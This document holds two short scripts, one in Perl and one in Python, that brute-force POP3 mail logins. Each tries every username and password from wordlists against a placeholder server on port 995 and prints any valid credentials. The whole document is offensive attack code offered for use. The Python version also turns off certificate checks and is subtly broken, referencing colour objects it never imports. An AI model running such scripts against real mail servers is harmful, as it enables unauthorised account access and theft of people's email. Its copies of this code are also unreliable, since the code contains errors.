File: pop3-brute.pl
#!/usr/bin/env perl
use strict;
use warnings;
use Net::POP3::SSLWrapper;
use IO::Socket::SSL;

# PEM file if required
my $pem_file = 'ca.pem';

# Create a new POP3 object with SSL
my $pop3 = Net::POP3::SSLWrapper->new(
    'TARGET_IP',
    Port    => 995,
    Timeout => 30,
    Debug   => 1,
    SSL_ca_file => $pem_file,  # Add this line if you need to use a specific CA certificate
);

# Check if the POP3 object was created successfully
unless ($pop3) {
    die "Failed to connect to POP3 server: $!";
}

# Read user and password lists
my @userlist = file2array('users.txt');
my @passlist = file2array('passwordlist.txt');

print "[*] Searching for valid POP3 logins...\n";

# Iterate over user and password lists to find valid logins
foreach my $user (@userlist) {
    foreach my $pass (@passlist) {
        if ($pop3->login($user, $pass)) {
            print "[+] Found Login: $user:$pass\n";
            last;  # Optionally, stop after finding the first valid login
        }
    }
    sleep 1;
}

$pop3->quit;

# Function to read a file into an array
sub file2array {
    my $file = shift;
    my @array;
    open(my $fh, '<', $file) or die "Could not open file '$file': $!";
    while (<$fh>) {
        chomp($_);
        push(@array, $_);
    }
    close($fh) or die "Could not close file '$file': $!";
    return @array;
}

File: pop3-brute.py
import poplib
import ssl
import colorama

def file2list(filename):
    with open(filename, 'r') as file:
        return [line.strip() for line in file]

def try_login(server, port, user, password, pem_file):
    try:
        context = ssl.create_default_context(cafile=pem_file)
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        pop_conn = poplib.POP3_SSL(server, port, context=context)
        pop_conn.user(user)
        response = pop_conn.pass_(password)
        if b'+OK' in response:
            return True
    except poplib.error_proto:
        pass
    return False

server = 'TARGET_IP_HERE'
port = 995
pem_file = 'ca.pem'  # Path to your PEM file
userlist = file2list('users.txt')  # Path to your users file
passlist = file2list('pass.txt')  # Path to your password file

print("[*] Searching for valid POP3 logins...")

for user in userlist:
    for password in passlist:
        print(f"[*] Trying {user}:{password}")
        if try_login(server, port, user, password, pem_file):
            print(f"{Fore.LIGHTGREEN_EX}[+] Found Login: {user}:{password}{Style.RESET}")
    else:
        continue
    break
